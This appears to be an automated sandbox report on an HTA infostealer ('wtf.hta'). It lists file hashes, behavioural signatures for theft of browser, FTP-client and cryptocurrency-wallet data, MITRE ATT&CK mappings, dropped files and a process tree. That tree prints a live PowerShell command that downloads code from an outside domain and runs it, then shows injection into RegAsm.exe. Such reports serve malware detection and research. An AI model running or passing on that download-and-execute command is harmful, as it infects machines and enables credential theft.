96a0a4b4ffef57346dac75bc99f53587f44fc1cc45643b7c14a73cae804fe19d

General

Target

wtf.hta
Size

46KB
MD5

5fbdd6357b961e941acd3c06ba2e867e
SHA1

ac1f9b5ffd9c6fa8790bf235f73bd53f699c527b
SHA256

f135e8b3678ef36330cc8e8f1986cf40d83fb4159c8d5363ba44b78d14f85f17
SHA512

c63211263355c854c19964c37cd9857e08a90a694e087bfe6e5c1d35cc579ae75b9e5c5279172c8b24ce925a3476408ded33a32d09f7cc5b820e0cbd1dbb2907
SSDEEP

768:2bang59+ttT+fEV8yEH445wBodvJdgg6i1UY8o53YH:2baXLWEXEp5wcdgziK/H

Score

10^/10

spyware stealer

Malware Config

Signatures

Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 404 4584 powershell.exe
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

4 404 powershell.exe
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

404 powershell.exe
404 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 404 powershell.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	404	4584	powershell.exe

flow	pid	process
4	404	powershell.exe

pid	process
404	powershell.exe
404	powershell.exe

description	pid	process
Token: SeDebugPrivilege	404	powershell.exe

Suspicious use of WriteProcessMemory 8 IoCs

Processes:

powershell.execsc.exe

description	pid	process	target process
PID 404 wrote to memory of 1756	404	powershell.exe	csc.exe
PID 404 wrote to memory of 1756	404	powershell.exe	csc.exe
PID 1756 wrote to memory of 2120	1756	csc.exe	cvtres.exe
PID 1756 wrote to memory of 2120	1756	csc.exe	cvtres.exe
PID 404 wrote to memory of 3700	404	powershell.exe	RegAsm.exe
PID 404 wrote to memory of 3700	404	powershell.exe	RegAsm.exe
PID 404 wrote to memory of 3700	404	powershell.exe	RegAsm.exe
PID 404 wrote to memory of 3700	404	powershell.exe	RegAsm.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\wtf.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
PID:1596

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command irm https://sevensunday.co.ke/tete/describe.tet | iex
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:404

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\q1gkccvm\q1gkccvm.cmdline"
2⤵
- Suspicious use of WriteProcessMemory
PID:1756

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES442D.tmp" "c:\Users\Admin\AppData\Local\Temp\q1gkccvm\CSC8332CD9FB12D469C9FDD79E12856DDE.TMP"
3⤵
PID:2120

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
2⤵
PID:3700

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Unsecured Credentials

3

T1552

Credentials In Files

3

T1552.001

Discovery

Lateral Movement

Collection

Data from Local System

3

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES442D.tmp

Filesize
1KB

MD5
5b5f0f4fc34ec406d83f39abb43c1a07

SHA1
f770aeb7755002f8a6f1361718c3f33f8abd0474

SHA256
f773e9c7981b43cadfcf44c1243bcf0b163066cb3d36632bd21e070ae2c60f48

SHA512
84afd33bac399cdcdbcb9447c1df0585c3b38892f35c2ec8298c77e9d86300948894b5ccd3d09b67536a2decaafacdd8eeb74322d9f2380f447a418196582631

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1nkrvibx.ck3.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\q1gkccvm\q1gkccvm.dll

Filesize
3KB

MD5
3ccbc8205c5e8efc9babd32ee0b86764

SHA1
fa7e5621de277783dc853ddfadb658de53f4e50d

SHA256
ae05fce688ca757429decdf9d638800698c45ee6d3fc56147666dc3e731f32e8

SHA512
c6333bb74d4cc56ad0b4acd3cb177c879f09cfd701646f8cfda4a7c67e8bda058aaa86c87181c02f3123cd115090ff58b9ae7fa63b80c5508c3a2aefee7206bb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\q1gkccvm\CSC8332CD9FB12D469C9FDD79E12856DDE.TMP

Filesize
652B

MD5
ab03ab505d02f1995583ad25866cdd16

SHA1
06ad3fd8bbb2a10bf1ee56e316a4e05ea5ce3248

SHA256
bcfc2fd4c2fd84c7fe9c7b59ef17a394e542d9771e0e93fe171322dd1587de75

SHA512
d86331b9890b28d29623eef8f94845e35e334cf63bc0747ff2574f24ecbbba8680b0bf2871ef508e1ae4330fd0a6a8c16196d988368915ae16fe69917b3da1a9

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\q1gkccvm\q1gkccvm.0.cs

Filesize
302B

MD5
536c07d095670c7d6cf3045ff8764784

SHA1
bcc7d23eeae1ebdf4ee06434ef24da592580f488

SHA256
c4efd053c4ad51475e24c2c6d2ceef9ff22e936c4242c04e562de675ef27e800

SHA512
60efa933633ce72479ac28bfa36daa9866b9d58645401cf93b2beeedc84bdb88fb944bd35cb86eaf30b4c16c3cdc298783213600fae1b9faa8a08b7a41691fdf

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\q1gkccvm\q1gkccvm.cmdline

Filesize
369B

MD5
07c8282ab9335d7d9abe838bcade8b00

SHA1
425ad684eaa6b27f9b7f7a3320c60f483f254b74

SHA256
d6e42772e2f4cdc4634da510df37ef0b06f1b36d8fb7d70692b32b48c1833b15

SHA512
8fcdb36ead1c6dfeb69bc41b7bdba006e13d05aa8618fab2617467ece8e6aa10efb904f122fcd6575ef5629a96992fb37436c199502571c2e6ba36cf9a6d8e8c

Download Submit
memory/404-12-0x0000019DF3C70000-0x0000019DF3C80000-memory.dmp

Filesize
64KB

Download
memory/404-13-0x0000019DF63F0000-0x0000019DF65B2000-memory.dmp

Filesize
1.8MB

Download
memory/404-0-0x0000019DF3900000-0x0000019DF3922000-memory.dmp

Filesize
136KB

Download
memory/404-11-0x0000019DF3C70000-0x0000019DF3C80000-memory.dmp

Filesize
64KB

Download
memory/404-10-0x00007FFAAE6B0000-0x00007FFAAF171000-memory.dmp

Filesize
10.8MB

Download
memory/404-26-0x0000019DF3C40000-0x0000019DF3C48000-memory.dmp

Filesize
32KB

Download
memory/404-28-0x0000019DF6220000-0x0000019DF63A0000-memory.dmp

Filesize
1.5MB

Download
memory/404-29-0x0000019DF3C50000-0x0000019DF3C51000-memory.dmp

Filesize
4KB

Download
memory/404-32-0x0000019DF3C70000-0x0000019DF3C80000-memory.dmp

Filesize
64KB

Download
memory/404-35-0x00007FFAAE6B0000-0x00007FFAAF171000-memory.dmp

Filesize
10.8MB

Download
memory/3700-30-0x0000000001300000-0x0000000001353000-memory.dmp

Filesize
332KB

Download
memory/3700-31-0x0000000003050000-0x000000000309E000-memory.dmp

Filesize
312KB

Download
memory/3700-37-0x0000000003050000-0x000000000309E000-memory.dmp

Filesize
312KB

Download

Analysis

Sharing